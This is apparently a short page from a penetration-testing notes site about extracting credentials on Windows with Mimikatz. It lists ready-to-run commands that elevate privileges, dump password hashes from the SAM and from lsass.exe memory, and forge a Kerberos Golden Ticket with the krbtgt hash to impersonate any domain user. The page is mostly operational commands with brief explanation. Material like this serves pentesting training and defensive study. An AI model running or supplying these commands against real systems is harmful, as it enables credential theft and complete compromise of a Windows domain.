Credentials on Windows

Mimikatz

To quote its creator's github, mimikatz is a tool I've made to learn C and make somes experiments with Windows security.

It's well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket, build Golden tickets, play with certificates or private keys, vault, ...

Hash dumping

#Checks if mimikatz is running with admin rights, elevates those (code 20 ; OK)
privilege::debug
token::elevate

#Dumps from SAM (Security Account Managers)
lsadump::lsa /patch

lsadump::SAM

#Extracts from the lsass.exe process (memory)
sekurlsa::logonpasswords

Golden ticket creation

A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.

A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.

#Creates a golden ticket using the krbtgt user's hash and SID

kerberos::golden /user:[admin] /domain:TEST.local /sid:[sid] /krbtgt:[NTLM hash]

PreviousLocal Privilege Escalation NextBasic enumeration checklist

Last updated 4 years ago

hashtagMimikatz

hashtag

hashtagHash dumping

hashtagGolden ticket creation

Mimikatz

Hash dumping

Golden ticket creation